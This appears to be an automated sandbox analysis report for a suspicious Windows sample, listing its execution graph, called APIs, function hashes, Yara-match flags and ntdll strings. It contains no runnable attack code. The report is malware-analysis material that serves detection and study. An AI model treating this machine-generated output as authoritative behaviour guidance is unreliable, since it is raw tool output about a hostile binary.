                                  • Opcode ID: 1cdeb51a2a280948e25f18172bb4a9f0b8dcb07926ab99a18001021a3a543caf
                                  • Instruction ID: 49b0d5a738afcd776243c72a75a34953f6b143e06a58adbf2b30913959e63189
                                  • Opcode Fuzzy Hash: 1cdeb51a2a280948e25f18172bb4a9f0b8dcb07926ab99a18001021a3a543caf
                                  • Instruction Fuzzy Hash: BDD1C235A002088FDB48DF6AC588BA9B7F5BF8D705F2580A8E515AB361DB31ED41CF60
                                  Function 00C7D364 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3944b82e2a4d1e3ad65f46d2d05770c45bcb02395fdc3c46ba87306c281dccc6
                                  • Instruction ID: 665a7a0cbdf555db2d768d0528d501af31d7c62de49375c7a4ba20754ce5acb6
                                  • Opcode Fuzzy Hash: 3944b82e2a4d1e3ad65f46d2d05770c45bcb02395fdc3c46ba87306c281dccc6
                                  • Instruction Fuzzy Hash: CFA16C36A002098FCF05DFB5C88459EB7B2FF85304B15857EE919AB262DB71EA06DB50

                                  Execution Graph

                                  Execution Coverage:1.2%
                                  Dynamic/Decrypted Code Coverage:4.5%
                                  Signature Coverage:2.6%
                                  Total number of Nodes:154
                                  Total number of Limit Nodes:19
                                  execution_graph 93859 423a43 93860 423a5f 93859->93860 93861 423a87 93860->93861 93862 423a9b 93860->93862 93864 42ac23 NtClose 93861->93864 93869 42ac23 93862->93869 93866 423a90 93864->93866 93865 423aa4 93872 42cc13 RtlAllocateHeap 93865->93872 93868 423aaf 93870 42ac3d 93869->93870 93871 42ac4e NtClose 93870->93871 93871->93865 93872->93868 93942 42a253 93943 42a26d 93942->93943 93946 fb2df0 LdrInitializeThunk 93943->93946 93944 42a295 93946->93944 93947 42dbd3 93948 42dbe3 93947->93948 93949 42dbe9 93947->93949 93950 42cbd3 RtlAllocateHeap 93949->93950 93951 42dc0f 93950->93951 93952 423dd3 93953 423de2 93952->93953 93954 423e29 93953->93954 93957 423e63 93953->93957 93959 423e68 93953->93959 93955 42caf3 RtlFreeHeap 93954->93955 93956 423e35 93955->93956 93958 42caf3 RtlFreeHeap 93957->93958 93958->93959 93873 411443 93874 411455 93873->93874 93879 413613 93874->93879 93877 42ac23 NtClose 93878 41146e 93877->93878 93880 413639 93879->93880 93882 411461 93880->93882 93883 4133b3 LdrInitializeThunk 93880->93883 93882->93877 93883->93882 93884 41d8a3 93885 41d8c9 93884->93885 93891 41d9ba 93885->93891 93893 42dd03 93885->93893 93887 41d955 93888 41d9b1 93887->93888 93887->93891 93904 42a2a3 93887->93904 93888->93891 93899 427373 93888->93899 93892 41da67 93894 42dc73 93893->93894 93895 42dcd0 93894->93895 93908 42cbd3 93894->93908 93895->93887 93897 42dcad 93911 42caf3 93897->93911 93900 4273d0 93899->93900 93901 42740b 93900->93901 93920 418183 93900->93920 93901->93892 93903 4273ed 93903->93892 93905 42a2c0 93904->93905 93927 fb2c0a 93905->93927 93906 42a2ec 93906->93888 93914 42af43 93908->93914 93910 42cbee 93910->93897 93917 42af93 93911->93917 93913 42cb0c 93913->93895 93915 42af5d 93914->93915 93916 42af6e RtlAllocateHeap 93915->93916 93916->93910 93918 42afb0 93917->93918 93919 42afc1 RtlFreeHeap 93918->93919 93919->93913 93921 41818e 93920->93921 93923 418152 93920->93923 93921->93903 93923->93903 93923->93920 93924 42afe3 93923->93924 93925 42b000 93924->93925 93926 42b00e ExitProcess 93925->93926 93926->93923 93928 fb2c1f LdrInitializeThunk 93927->93928 93929 fb2c11 93927->93929 93928->93906 93929->93906 93960 41a7d3 93961 41a817 93960->93961 93962 41a838 93961->93962 93963 42ac23 NtClose 93961->93963 93963->93962 93964 4138b3 93965 4138cd 93964->93965 93970 417193 93965->93970 93967 4138eb 93968 413930 93967->93968 93969 41391f PostThreadMessageW 93967->93969 93969->93968 93972 4171b7 93970->93972 93971 4171be 93971->93967 93972->93971 93973 4171f3 LdrLoadDll 93972->93973 93973->93971 93974 4019b3 93975 4019a7 93974->93975 93976 4019d2 93974->93976 93979 42e093 93976->93979 93982 42c6e3 93979->93982 93983 42c709 93982->93983 93994 4072b3 93983->93994 93985 42c71f 93993 401a8c 93985->93993 93997 41a5e3 93985->93997 93987 42c73e 93989 42afe3 ExitProcess 93987->93989 93991 42c753 93987->93991 93989->93991 93990 42c762 93992 42afe3 ExitProcess 93990->93992 94008 426ce3 93991->94008 93992->93993 94012 415ed3 93994->94012 93996 4072c0 93996->93985 93998 41a60f 93997->93998 94023 41a4d3 93998->94023 94001 41a654 94003 41a670 94001->94003 94006 42ac23 NtClose 94001->94006 94002 41a63c 94004 41a647 94002->94004 94005 42ac23 NtClose 94002->94005 94003->93987 94004->93987 94005->94004 94007 41a666 94006->94007 94007->93987 94009 426d3d 94008->94009 94011 426d4a 94009->94011 94034 417ce3 94009->94034 94011->93990 94013 415eea 94012->94013 94015 415f03 94013->94015 94016 42b673 94013->94016 94015->93996 94018 42b68b 94016->94018 94017 42b6af 94017->94015 94018->94017 94019 42a2a3 LdrInitializeThunk 94018->94019 94020 42b701 94019->94020 94021 42caf3 RtlFreeHeap 94020->94021 94022 42b717 94021->94022 94022->94015 94024 41a5c9 94023->94024 94025 41a4ed 94023->94025 94024->94001 94024->94002 94029 42a343 94025->94029 94028 42ac23 NtClose 94028->94024 94030 42a35d 94029->94030 94033 fb35c0 LdrInitializeThunk 94030->94033 94031 41a5bd 94031->94028 94033->94031 94037 417ce4 94034->94037 94035 41818e 94035->94011 94036 42afe3 ExitProcess 94041 417e2c 94036->94041 94037->94041 94042 413593 94037->94042 94039 417e14 94040 42caf3 RtlFreeHeap 94039->94040 94039->94041 94040->94041 94041->94011 94041->94035 94041->94036 94046 4135a9 94042->94046 94044 41360c 94044->94039 94045 413604 94045->94039 94046->94044 94047 41a8f3 RtlFreeHeap LdrInitializeThunk 94046->94047 94047->94045 93930 413409 93931 4133c1 93930->93931 93932 4133d5 93930->93932 93934 42aea3 93931->93934 93935 42aec0 93934->93935 93938 fb2c70 LdrInitializeThunk 93935->93938 93936 42aee8 93936->93932 93938->93936 93939 418388 93940 42ac23 NtClose 93939->93940 93941 418392 93940->93941 94048 fb2b60 LdrInitializeThunk

                                  Executed Functions

                                  Function 00417193 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 153 417193-4171af 154 4171b7-4171bc 153->154 155 4171b2 call 42d7f3 153->155 156 4171c2-4171d0 call 42dd13 154->156 157 4171be-4171c1 154->157 155->154 161 4171e0-4171f1 call 42c1b3 156->161 162 4171d2-4171dd call 42dfb3 156->162 167 4171f3-417207 LdrLoadDll 161->167 168 41720a-41720d 161->168 162->161 167->168
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417205
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 556ecf4033892e70c448fa113439e915cdceb84abb21a89278d86960d9f6791b
                                  • Instruction ID: e0d86ee790bc3a143c255ee474eae3979154a21eaf55839e7d59f156d3023cf4
                                  • Opcode Fuzzy Hash: 556ecf4033892e70c448fa113439e915cdceb84abb21a89278d86960d9f6791b
                                  • Instruction Fuzzy Hash: 140171B1E0020DBBDF10DBE1DD42FDEB3B8AB54304F00419AE90897240FA74EB548B95
                                  Function 0042AC23 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 174 42ac23-42ac5c call 4047e3 call 42bcd3 NtClose
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 1010b141b799f08bc6b8236fe2fb27fb77327c420ff2ec9ea6ebb0c244e8a399
                                  • Instruction ID: 05383523dace9b53952cf8c849f04e1027086779073f8b0e6bc5fde5db485fce
                                  • Opcode Fuzzy Hash: 1010b141b799f08bc6b8236fe2fb27fb77327c420ff2ec9ea6ebb0c244e8a399
                                  • Instruction Fuzzy Hash: 0FE08C7A2002147BC220EA5ADC41FDBB76CDFC9714F00416AFA08AB241CBB0BA0187F4
                                  Function 00FB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9cf608c65efdaa56300a7c35f23e1fb2cb65d8ea9fe6f8b6b236f5630d0aed6f
                                  • Instruction ID: 47fbe135e8bea4eabfb918b7d945aeb5ab33d0f5f0e01880bd641e1ff638cd88
                                  • Opcode Fuzzy Hash: 9cf608c65efdaa56300a7c35f23e1fb2cb65d8ea9fe6f8b6b236f5630d0aed6f
                                  • Instruction Fuzzy Hash: 9B90026120240113420571598515B16400A87E0341B55C036E1014590EC92A89927125
                                  Function 00FB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 77a57dddc62965488e89132ef8ce156c341a64f860157b92796d966612a4d28d
                                  • Instruction ID: 478c82dba3950a886dacb26628c784f6d74f3b536b17e01a4bdc7c22baf068b5
                                  • Opcode Fuzzy Hash: 77a57dddc62965488e89132ef8ce156c341a64f860157b92796d966612a4d28d
                                  • Instruction Fuzzy Hash: 3F90023120148912D2107159C505B4A000587D0341F59C426A4424658E8A9A89927121
                                  Function 00FB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0e559e56f872fcd1b7d1478be51161b8b36a7ec463f8eb8d4c2437ebf3504c47
                                  • Instruction ID: ba70b703e36e9163feae64d6d06dffea3f1e0448f123e9780496bda7c6cc744a
                                  • Opcode Fuzzy Hash: 0e559e56f872fcd1b7d1478be51161b8b36a7ec463f8eb8d4c2437ebf3504c47
                                  • Instruction Fuzzy Hash: 2390023120140523D21171598605B07000987D0381F95C427A0424558E9A5B8A53B121
                                  Function 00FB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
                                  • Instruction ID: 76e28ed9f350a4ad1f76669855933339268c00f56b0119d7f2b7e96b06a9b182
                                  • Opcode Fuzzy Hash: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
                                  • Instruction Fuzzy Hash: D790023160550512D20071598615B06100587D0341F65C426A0424568E8B9A8A5275A2
                                  Function 00413791 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 413791-4137b4 2 4137b6-4137c1 0->2 3 41375f-413779 0->3 7 4137c3-4137c5 2->7 8 4137de-4137ec 2->8 4 41375b-41375d 3->4 5 41377b-41377c 3->5 4->3 5->0 7->8 9 4137ee-413806 8->9 11 413844-413857 9->11 12 413808-41381c 9->12 11->9 13 413859-41388d 11->13 14 413891-413897 12->14 15 41381e-413841 12->15 16 4138db-41391d call 417193 call 404753 call 423ed3 13->16 14->16 15->11 24 41393d-413943 16->24 25 41391f-41392e PostThreadMessageW 16->25 25->24 26 413930-41393a 25->26 26->24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 382-I9W6$382-I9W6$od;
                                  • API String ID: 0-3716586553
                                  • Opcode ID: a468640ef5fcaee519deb961dca19399ca584422a0e75902a66b50bc8b7b36d5
                                  • Instruction ID: f82c95734c266ff4266ec36e9bfeb71f32fc8b5cfeae070adc91c53c9a0d09bd
                                  • Opcode Fuzzy Hash: a468640ef5fcaee519deb961dca19399ca584422a0e75902a66b50bc8b7b36d5
                                  • Instruction Fuzzy Hash: AE411EF3D085516BCB028F74CCC2DDABBBAEB5135871085AAE490A7242D22D9A038BD1
                                  Function 004137C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 27 4137c8-4137d6 28 413835-413841 27->28 29 4137d9-4137ec 27->29 30 413844-413857 28->30 31 4137ee-413806 29->31 30->31 32 413859-41388d 30->32 31->30 35 413808-41381c 31->35 34 4138db-41391d call 417193 call 404753 call 423ed3 32->34 44 41393d-413943 34->44 45 41391f-41392e PostThreadMessageW 34->45 37 413891-413897 35->37 38 41381e-413823 35->38 37->34 38->28 45->44 46 413930-41393a 45->46 46->44
                                  APIs
                                  • PostThreadMessageW.USER32(382-I9W6,00000111,00000000,00000000), ref: 0041392A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 382-I9W6$382-I9W6$od;
                                  • API String ID: 1836367815-3716586553
                                  • Opcode ID: 83adad6fd1c4f93632319bd7082edc653898c6ea9b594f5a393a8b6e882e9b34
                                  • Instruction ID: 146a715bdc5deed7a45a6c45ae48d7b2ea82dee7ab7e1cbae62c70d59ead3189
                                  • Opcode Fuzzy Hash: 83adad6fd1c4f93632319bd7082edc653898c6ea9b594f5a393a8b6e882e9b34
                                  • Instruction Fuzzy Hash: 8931FEB39481856BC7028F74CC81DEEBBB9EF01399714916EF04097242D3299A47CBC1
                                  Function 00413829 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 47 413829-413841 48 413844-413857 47->48 49 413859-41388d 48->49 50 4137ee-413806 48->50 51 4138db-41391d call 417193 call 404753 call 423ed3 49->51 50->48 54 413808-41381c 50->54 63 41393d-413943 51->63 64 41391f-41392e PostThreadMessageW 51->64 56 413891-413897 54->56 57 41381e-413841 54->57 56->51 57->48 64->63 65 413930-41393a 64->65 65->63
                                  APIs
                                  • PostThreadMessageW.USER32(382-I9W6,00000111,00000000,00000000), ref: 0041392A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 382-I9W6$382-I9W6$od;
                                  • API String ID: 1836367815-3716586553
                                  • Opcode ID: 0fb42427e7fa0c9da179d1ec99df921e29c0f0ab5b496fc7503520f239258997
                                  • Instruction ID: bcf2b54c19ca22e83fa5fcaed79ea75f46cce30e0fb5d2956bcf726e00e02faa
                                  • Opcode Fuzzy Hash: 0fb42427e7fa0c9da179d1ec99df921e29c0f0ab5b496fc7503520f239258997
                                  • Instruction Fuzzy Hash: 6B217CF2A041843AD7024A64CC81CEEBB7CDF41759B2584AAF844A7282D3694E0787E1
                                  Function 004138AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(382-I9W6,00000111,00000000,00000000), ref: 0041392A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 382-I9W6$382-I9W6
                                  • API String ID: 1836367815-1880479850
                                  • Opcode ID: 4f365cddde5e7cd6dc9ea85624f8874ca8bdc4c5b947b1123c6f3e49d9a2ab0d
                                  • Instruction ID: 20d1104ea2c1bb41a0378db224dd29171c51e0c447d0ed2a8a6c4d1031a78229
                                  • Opcode Fuzzy Hash: 4f365cddde5e7cd6dc9ea85624f8874ca8bdc4c5b947b1123c6f3e49d9a2ab0d
                                  • Instruction Fuzzy Hash: E511E5B2D4025C79EB10ABE19C82DEF7B7CDF41298F04816EFA04B7241D5AC4E068BA5
                                  Function 004138B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 90 4138b3-4138c5 91 4138cd-41391d call 42d5a3 call 417193 call 404753 call 423ed3 90->91 92 4138c8 call 42cb93 90->92 102 41393d-413943 91->102 103 41391f-41392e PostThreadMessageW 91->103 92->91 103->102 104 413930-41393a 103->104 104->102
                                  APIs
                                  • PostThreadMessageW.USER32(382-I9W6,00000111,00000000,00000000), ref: 0041392A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 382-I9W6$382-I9W6
                                  • API String ID: 1836367815-1880479850
                                  • Opcode ID: 2e9a239f3ffeef7da310deaa60ba2cc70fa998a3901fc275e3113c2775f9533f
                                  • Instruction ID: 334f823e380d9361b19e88e2a8585db767e488738a68918053c73c054f21de55
                                  • Opcode Fuzzy Hash: 2e9a239f3ffeef7da310deaa60ba2cc70fa998a3901fc275e3113c2775f9533f
                                  • Instruction Fuzzy Hash: 2F01C4B1D0021C7ADB10AAE19C82DEF7B7C9F41698F40806AFA04A7241D6A89E0687A5
                                  Function 0042AF93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 114 42af93-42afd7 call 4047e3 call 42bcd3 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042AFD2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: K_A
                                  • API String ID: 3298025750-3212217262
                                  • Opcode ID: 84d59ce22b5060dd53ea98227712cc744f387e3927bb92697b2737a782d3167e
                                  • Instruction ID: 8ba96a132a0f6975465d5b41d2c53e7cb4f72c8846cbeb262b6565929678646d
                                  • Opcode Fuzzy Hash: 84d59ce22b5060dd53ea98227712cc744f387e3927bb92697b2737a782d3167e
                                  • Instruction Fuzzy Hash: 3AE0EDB63046187BD614EE5AEC41F9B77ACDFC9714F004459F908A7241D774B91086B5
                                  Function 0042AF43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 169 42af43-42af84 call 4047e3 call 42bcd3 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,0041D955,?,?,00000000,?,0041D955,?,?,?), ref: 0042AF7F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 72d9412c0a8a6ad336be9107f983141fa821af57217565be2581133eebb49ae6
                                  • Instruction ID: a18b99bbe9e27a6353ceb2586cb886232819348111ae1a3b2d567a2a2abada4b
                                  • Opcode Fuzzy Hash: 72d9412c0a8a6ad336be9107f983141fa821af57217565be2581133eebb49ae6
                                  • Instruction Fuzzy Hash: F9E06D76204214BBC610EE5AEC41F9B77ACDFC9714F00401EFA18A7241C670B9108AF4
                                  Function 0042AFE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 179 42afe3-42b01c call 4047e3 call 42bcd3 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,?,?,1B04307A,?,?,1B04307A), ref: 0042B017
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_CMV610942X6UI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: df768c527a0d056421427b530df4483f2f0511246e9274226db601f489ba10f6
                                  • Instruction ID: 02d62f04bdb32b51547d54fc8fbc931a459763424b7699fe4cbab0b3b9eff1b0
                                  • Opcode Fuzzy Hash: df768c527a0d056421427b530df4483f2f0511246e9274226db601f489ba10f6
                                  • Instruction Fuzzy Hash: ABE04F352006147BE210BB5ADC41F9BB76CDBC6710F004519FA18A7142C671B94086F5
                                  Function 00FB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                  • Instruction ID: 4197e17a98aac88052eed55bc4bf83f98d9f911cf9d010573d113f9e9389cfa8
                                  • Opcode Fuzzy Hash: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                  • Instruction Fuzzy Hash: 0BB09B71D015C5D5DB51E7614709B1B7E0067D0751F15C076D2030641F473DC5D1F575

                                  Non-executed Functions

                                  Function 00FF2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                  • Instruction ID: a68ccb417c3ebc16656292551e6384a4601503a3a40e45065922be92af674680
                                  • Opcode Fuzzy Hash: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                  • Instruction Fuzzy Hash: 0F92CC71A04345AFE760DF24C881B6BB7E8BF84760F04482DFA84D72A1D774E944EB92
                                  Function 00FA8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • double initialized or corrupted critical section, xrefs: 00FE5508
                                  • Critical section address., xrefs: 00FE5502
                                  • Invalid debug info address of this critical section, xrefs: 00FE54B6
                                  • Critical section address, xrefs: 00FE5425, 00FE54BC, 00FE5534
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FE540A, 00FE5496, 00FE5519
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 00FE5543
                                  • corrupted critical section, xrefs: 00FE54C2
                                  • 8, xrefs: 00FE52E3
                                  • Thread identifier, xrefs: 00FE553A
                                  • Address of the debug info found in the active list., xrefs: 00FE54AE, 00FE54FA
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FE54E2
                                  • undeleted critical section in freed memory, xrefs: 00FE542B
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FE54CE
                                  • Critical section debug info address, xrefs: 00FE541F, 00FE552E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                  • Instruction ID: f937d6a7722a1e6d5b36b741c7b87da46b4ad9c054815362ba9eca10b8e1b039
                                  • Opcode Fuzzy Hash: 905d3c58330d402f2dbd4fd15e0818cb1d5efc436747825aa7ca25239e5fd52f
                                  • Instruction Fuzzy Hash: 9881BFB1E00748AFDB20CF95C841BAEBBB5FB08B58F244119FA05B7280D7B5AD45EB51
                                  Function 00FA29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FE261F
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FE22E4
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FE2602
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FE25EB
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FE2498
